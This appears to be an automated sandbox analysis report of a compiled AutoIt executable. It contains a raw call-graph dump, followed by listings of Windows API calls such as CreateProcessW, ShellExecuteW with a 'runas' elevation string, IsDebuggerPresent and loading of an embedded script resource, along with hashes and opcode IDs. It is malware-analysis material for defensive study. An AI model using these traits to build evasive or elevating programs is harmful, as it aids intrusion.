98938->98941 98939->98928 98939->98940 98946 7ff7c0eef905 98940->98946 98947 7ff7c0eef901 98940->98947 98943 7ff7c0eef798 98941->98943 98945 7ff7c0e5e330 4 API calls 98943->98945 98944 7ff7c0eef8d0 99003 7ff7c0e6f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98944->99003 98949 7ff7c0eef7a4 98945->98949 99005 7ff7c0ecfddc 8 API calls 98946->99005 98956 7ff7c0eef972 98947->98956 98957 7ff7c0eefa0f CreateProcessW 98947->98957 98951 7ff7c0e5d4cc 48 API calls 98949->98951 98950 7ff7c0eef8e0 99004 7ff7c0e6f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98950->99004 98954 7ff7c0eef7b9 98951->98954 98959 7ff7c0e5e330 4 API calls 98954->98959 98955 7ff7c0eef90e 99006 7ff7c0ecfca8 8 API calls 98955->99006 99008 7ff7c0ebd1f8 99 API calls 98956->99008 98968 7ff7c0eef9b4 98957->98968 98961 7ff7c0eef7c5 98959->98961 98963 7ff7c0eef806 GetSystemDirectoryW 98961->98963 98965 7ff7c0e5d4cc 48 API calls 98961->98965 98962 7ff7c0eef926 99007 7ff7c0ecfafc 8 API calls ~SyncLockT 98962->99007 98967 7ff7c0e74c68 4 API calls 98963->98967 98969 7ff7c0eef7e1 98965->98969 98966 7ff7c0eef94f 98966->98947 98970 7ff7c0eef830 GetSystemDirectoryW 98967->98970 98971 7ff7c0eefabe CloseHandle 98968->98971 98978 7ff7c0eefa64 98968->98978 98972 7ff7c0e5e330 4 API calls 98969->98972 98970->98937 98973 7ff7c0eefaf5 98971->98973 98974 7ff7c0eefacc 98971->98974 98983 7ff7c0eef7ed 98972->98983 98975 7ff7c0eefafe 98973->98975 98980 7ff7c0eefb26 CloseHandle 98973->98980 99009 7ff7c0ecf7dc 98974->99009 98987 7ff7c0eefaa3 98975->98987 98981 7ff7c0eefa84 GetLastError 98978->98981 98980->98987 98981->98987 98983->98937 98983->98963 98993 7ff7c0ecf51c 98987->98993 98988->98785 98990 7ff7c0e5e342 98989->98990 98991 7ff7c0e74c68 4 API calls 98990->98991 98992 7ff7c0e5e361 wcscpy 98991->98992 98992->98925 98994 7ff7c0ecf7dc CloseHandle 98993->98994 98995 7ff7c0ecf52a 98994->98995 99014 7ff7c0ecf7b8 98995->99014 98998 7ff7c0ecf7b8 ~SyncLockT CloseHandle 
98999 7ff7c0ecf53c 98998->98999 99000 7ff7c0ecf7b8 ~SyncLockT CloseHandle 98999->99000 99001 7ff7c0ecf545 99000->99001 99001->98786 99002->98944 99003->98950 99004->98940 99005->98955 99006->98962 99007->98966 99008->98968 99010 7ff7c0ecf7b8 ~SyncLockT CloseHandle 99009->99010 99011 7ff7c0ecf7ee 99010->99011 99012 7ff7c0ecf7b8 ~SyncLockT CloseHandle 99011->99012 99013 7ff7c0ecf7f7 99012->99013 99015 7ff7c0ecf533 99014->99015 99016 7ff7c0ecf7c9 CloseHandle 99014->99016 99015->98998 99016->99015 99020 7ff7c0ecc7c0 lstrlenW 99017->99020 99021 7ff7c0ecc7dd GetFileAttributesW 99020->99021 99022 7ff7c0ecbdf5 99020->99022 99021->99022 99023 7ff7c0ecc7eb FindFirstFileW 99021->99023 99022->98801 99023->99022 99024 7ff7c0ecc7ff FindClose 99023->99024 99024->99022 99025 7ff7c0e75328 99048 7ff7c0e74cac 99025->99048 99028 7ff7c0e75474 99078 7ff7c0e757e4 7 API calls __scrt_fastfail 99028->99078 99029 7ff7c0e75344 99031 7ff7c0e7547e 99029->99031 99032 7ff7c0e75362 99029->99032 99079 7ff7c0e757e4 7 API calls __scrt_fastfail 99031->99079 99034 7ff7c0e75387 99032->99034 99040 7ff7c0e753a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 99032->99040 99054 7ff7c0e8ada4 99032->99054 99036 7ff7c0e75489 abort 99037 7ff7c0e7540d 99061 7ff7c0e75930 99037->99061 99039 7ff7c0e75412 99064 7ff7c0e53730 99039->99064 99040->99037 99075 7ff7c0e79204 35 API calls FindHandler 99040->99075 99045 7ff7c0e75435 99045->99036 99077 7ff7c0e74e90 8 API calls 2 library calls 99045->99077 99047 7ff7c0e7544c 99047->99034 99049 7ff7c0e74cce __scrt_initialize_crt 99048->99049 99080 7ff7c0e765ec 99049->99080 99051 7ff7c0e74cd7 99051->99028 99051->99029 99052 7ff7c0e74cd3 __scrt_initialize_crt 99052->99051 99088 7ff7c0e76620 8 API calls 3 library calls 99052->99088 99055 7ff7c0e8adff 99054->99055 99056 7ff7c0e8ade0 99054->99056 99055->99040 99056->99055 99113 7ff7c0e51048 99056->99113 99118 7ff7c0e51080 99056->99118 99123 7ff7c0e510e8 99056->99123 99128 7ff7c0e51064 99056->99128 99327 
7ff7c0e76240 99061->99327 99065 7ff7c0e537a3 99064->99065 99066 7ff7c0e53743 IsThemeActive 99064->99066 99076 7ff7c0e75974 GetModuleHandleW 99065->99076 99329 7ff7c0e792d0 99066->99329 99072 7ff7c0e5377d 99341 7ff7c0e537b0 99072->99341 99074 7ff7c0e53785 SystemParametersInfoW 99074->99065 99075->99037 99076->99045 99077->99047 99078->99031 99079->99036 99081 7ff7c0e765f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 99080->99081 99089 7ff7c0e77290 99081->99089 99084 7ff7c0e76603 99084->99052 99086 7ff7c0e7660c 99086->99084 99096 7ff7c0e772d8 DeleteCriticalSection 99086->99096 99088->99051 99092 7ff7c0e77298 99089->99092 99091 7ff7c0e772c9 99102 7ff7c0e772d8 DeleteCriticalSection 99091->99102 99092->99091 99094 7ff7c0e765ff 99092->99094 99097 7ff7c0e77614 99092->99097 99094->99084 99095 7ff7c0e77218 8 API calls 3 library calls 99094->99095 99095->99086 99096->99084 99103 7ff7c0e77310 99097->99103 99100 7ff7c0e77654 99100->99092 99101 7ff7c0e7765f InitializeCriticalSectionAndSpinCount 99101->99100 99102->99094 99104 7ff7c0e7736c try_get_function 99103->99104 99105 7ff7c0e77371 99103->99105 99104->99105 99106 7ff7c0e773a0 LoadLibraryExW 99104->99106 99109 7ff7c0e77454 99104->99109 99111 7ff7c0e77439 FreeLibrary 99104->99111 99112 7ff7c0e773fb LoadLibraryExW 99104->99112 99105->99100 99105->99101 99106->99104 99107 7ff7c0e773c1 GetLastError 99106->99107 99107->99104 99108 7ff7c0e77462 GetProcAddress 99110 7ff7c0e77473 99108->99110 99109->99105 99109->99108 99110->99105 99111->99104 99112->99104 99133 7ff7c0e57718 99113->99133 99117 7ff7c0e74f15 99117->99056 99153 7ff7c0e57920 99118->99153 99120 7ff7c0e5109e 99183 7ff7c0e74ebc 34 API calls _onexit 99120->99183 99122 7ff7c0e74f15 99122->99056 99217 7ff7c0e71d80 99123->99217 99127 7ff7c0e74f15 99127->99056 99242 7ff7c0e57ec0 99128->99242 99130 7ff7c0e5106d 99278 7ff7c0e74ebc 34 API calls _onexit 99130->99278 99132 7ff7c0e74f15 99132->99056 99134 7ff7c0e59640 4 API calls 99133->99134 99135 7ff7c0e5778f 99134->99135 

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E537F2
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E53807
• GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E5388D
  • Part of subcall function 00007FF7C0E53F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF7C0E538BF,?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E53FFD
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E53924
• MessageBoxA.USER32 ref: 00007FF7C0E9B888
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E9B8E1
• GetForegroundWindow.USER32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E9B968
• ShellExecuteW.SHELL32 ref: 00007FF7C0E9B98F
  • Part of subcall function 00007FF7C0E53B84: GetSysColorBrush.USER32 ref: 00007FF7C0E53B9E
  • Part of subcall function 00007FF7C0E53B84: LoadCursorW.USER32 ref: 00007FF7C0E53BAE
  • Part of subcall function 00007FF7C0E53B84: LoadIconW.USER32 ref: 00007FF7C0E53BC3
  • Part of subcall function 00007FF7C0E53B84: LoadIconW.USER32 ref: 00007FF7C0E53BDC
  • Part of subcall function 00007FF7C0E53B84: LoadIconW.USER32 ref: 00007FF7C0E53BF5
  • Part of subcall function 00007FF7C0E53B84: LoadImageW.USER32 ref: 00007FF7C0E53C21
  • Part of subcall function 00007FF7C0E53B84: RegisterClassExW.USER32 ref: 00007FF7C0E53C85
  • Part of subcall function 00007FF7C0E53CBC: CreateWindowExW.USER32 ref: 00007FF7C0E53D0C
  • Part of subcall function 00007FF7C0E53CBC: CreateWindowExW.USER32 ref: 00007FF7C0E53D5F
  • Part of subcall function 00007FF7C0E53CBC: ShowWindow.USER32 ref: 00007FF7C0E53D75
  • Part of subcall function 00007FF7C0E56258: Shell_NotifyIconW.SHELL32 ref: 00007FF7C0E56350
Strings
Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                                      • API String ID: 1593035822-3287110873
                                                                      • Opcode ID: 281c1e7be99c4a7b18314b13c4019a2424d473888b2523f6306895d303977498
                                                                      • Instruction ID: f28d4bf39988d1c18ce868720635db604448815cae68fb2f3476af5688b2c7a8
                                                                      • Opcode Fuzzy Hash: 281c1e7be99c4a7b18314b13c4019a2424d473888b2523f6306895d303977498
                                                                      • Instruction Fuzzy Hash: DC713B6195CA8795EA20FF60E8405F9E360BF41774FC00532E94D863AADF6CF689C7A0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                      • String ID: AU3!$EA06$SCRIPT
                                                                      • API String ID: 3051347437-2925976212
                                                                      • Opcode ID: 30f6ba7276d28cb9964872315e4a0112bd0f4edd02183a3a1bb8bc557d64f8ed
                                                                      • Instruction ID: 27f31272685c9fb1a58c459f5b44de0f25031023b9e2f0d856552810bbe821a4
                                                                      • Opcode Fuzzy Hash: 30f6ba7276d28cb9964872315e4a0112bd0f4edd02183a3a1bb8bc557d64f8ed
                                                                      • Instruction Fuzzy Hash: 24912272B49A4186EB20FF21D444ABDA7A8BB45BA8F814536DE4D87781DF7CF444C3A0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Process$CurrentInfoSystemVersionWow64
                                                                      • String ID: |O
                                                                      • API String ID: 1568231622-607156228
                                                                      • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                      • Instruction ID: efe60b21d9563ed03c07c162890fdd3ed7acf78d766a5b2c8630c46cca48474e
                                                                      • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                      • Instruction Fuzzy Hash: 73D18D21A9D28285FA21FF58A800975AB90AF517A4FC0017ADE8DC2775DF7CB180C7B5

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 1787492119-0
                                                                      • Opcode ID: ddb31b1ea6ffbce714698367dc00d601beb7cc94552172ff8982eeff5935b681
                                                                      • Instruction ID: 04e86f21ab5da2a86c1bbfc886ef7f39a57fbb2dbc6f1b4ca9c7cba438503062
                                                                      • Opcode Fuzzy Hash: ddb31b1ea6ffbce714698367dc00d601beb7cc94552172ff8982eeff5935b681
                                                                      • Instruction Fuzzy Hash: D9E1BF22B48B5585EB14FF26D4502BDA3A0FB84BA8F804532EE5D877A9DF38F441C790
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                      • String ID:
                                                                      • API String ID: 2695905019-0
                                                                      • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                      • Instruction ID: 1eef34be54a00ffdfdf17362f084cb2bcdadb48052c73f817cda9baa72e24a86
                                                                      • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                      • Instruction Fuzzy Hash: 67F05411E4C64281EA287F28A8083369261BF41BB5F944330D47E863E4DFACF49842A0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                      • API String ID: 2667193904-1575078665
                                                                      • Opcode ID: 556029334d18f1e7f1a6bcd8ff6412e7b433a3d19d3476e5022d6bd965ae193f
                                                                      • Instruction ID: 4da9e2274bf121f18bf45f772dccd41abfd90e226bab8c5c374e9f809123b77c
                                                                      • Opcode Fuzzy Hash: 556029334d18f1e7f1a6bcd8ff6412e7b433a3d19d3476e5022d6bd965ae193f
                                                                      • Instruction Fuzzy Hash: 05913F22A1CA5295EB50FF64E8405B9A364FF84764FC01132EA4D83BA5DFBCF645C7A0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                      • Instruction ID: 1dba336b18c11b9090d1c52788c0bc69adf5caddd4fdf9e563ab818a84f6b8d1
                                                                      • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                      • Instruction Fuzzy Hash: 03516B32D8CA4381F620BFA4E865579E660AF45B64FC40831D94DC27A5DF7CF684C7A0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-2659433951

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                      • String ID: close all
                                                                      • API String ID: 1992507300-3243417748

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: AutoIt v3
                                                                      • API String ID: 423443420-1704141276

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                      • String ID:
                                                                      • API String ID: 1617910340-0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                      • String ID:
                                                                      • API String ID: 3249950245-0

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 849 7ff7c0e53cbc-7ff7c0e53d88 CreateWindowExW * 2 ShowWindow * 2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$Show
                                                                      • String ID: AutoIt v3$d$edit
                                                                      • API String ID: 2813641753-2600919596

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00007FF7C0E72D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7C0E57FA5), ref: 00007FF7C0E72D8E
                                                                        • Part of subcall function 00007FF7C0E72D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7C0E57FA5), ref: 00007FF7C0E72D9C
                                                                        • Part of subcall function 00007FF7C0E72D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7C0E57FA5), ref: 00007FF7C0E72DAC
                                                                        • Part of subcall function 00007FF7C0E72D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7C0E57FA5), ref: 00007FF7C0E72DBC
                                                                        • Part of subcall function 00007FF7C0E72D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7C0E57FA5), ref: 00007FF7C0E72DCA
                                                                        • Part of subcall function 00007FF7C0E72D5C: MapVirtualKeyW.USER32(?,?,?,00007FF7C0E57FA5), ref: 00007FF7C0E72DD8
                                                                        • Part of subcall function 00007FF7C0E6EEC8: RegisterWindowMessageW.USER32 ref: 00007FF7C0E6EF76
                                                                      • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0E5106D), ref: 00007FF7C0E58209
                                                                      • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0E5106D), ref: 00007FF7C0E5828F
                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C0E5106D), ref: 00007FF7C0E9D36A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID: AutoIt
                                                                      • API String ID: 1986988660-2515660138

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmp
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                      • String ID: Line:
                                                                      • API String ID: 3135491444-1585850449
                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32 ref: 00007FF7C0E9BAA2
                                                                        • Part of subcall function 00007FF7C0E556D4: GetFullPathNameW.KERNEL32(?,00007FF7C0E556C1,?,00007FF7C0E57A0C,?,?,?,00007FF7C0E5109E), ref: 00007FF7C0E556FF
                                                                        • Part of subcall function 00007FF7C0E53EB4: GetLongPathNameW.KERNELBASE ref: 00007FF7C0E53ED8
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                      • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                      • API String ID: 779396738-2360590182
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                      • String ID:
                                                                      • API String ID: 3812282468-0
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7C0E56F52,?,?,?,?,?,?,00007FF7C0E5782C), ref: 00007FF7C0E56FA5
                                                                      • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF7C0E56F52,?,?,?,?,?,?,00007FF7C0E5782C), ref: 00007FF7C0E56FD3
                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF7C0E56F52,?,?,?,?,?,?,00007FF7C0E5782C), ref: 00007FF7C0E56FFA
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: CALL
                                                                      • API String ID: 1385522511-4196123274
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressFreeProc
                                                                      • String ID:
                                                                      • API String ID: 2632591731-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      APIs
                                                                      • IsThemeActive.UXTHEME ref: 00007FF7C0E53756
                                                                        • Part of subcall function 00007FF7C0E79334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C0E79348
                                                                        • Part of subcall function 00007FF7C0E536E8: SystemParametersInfoW.USER32 ref: 00007FF7C0E53705
                                                                        • Part of subcall function 00007FF7C0E536E8: SystemParametersInfoW.USER32 ref: 00007FF7C0E53725
                                                                        • Part of subcall function 00007FF7C0E537B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E537F2
                                                                        • Part of subcall function 00007FF7C0E537B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E53807
                                                                        • Part of subcall function 00007FF7C0E537B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E5388D
                                                                        • Part of subcall function 00007FF7C0E537B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E53924
                                                                      • SystemParametersInfoW.USER32 ref: 00007FF7C0E53797
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 4207566314-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 485612231-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast
                                                                      • String ID:
                                                                      • API String ID: 918212764-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                      • String ID:
                                                                      • API String ID: 3947729631-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      Similarity
                                                                      • API ID:
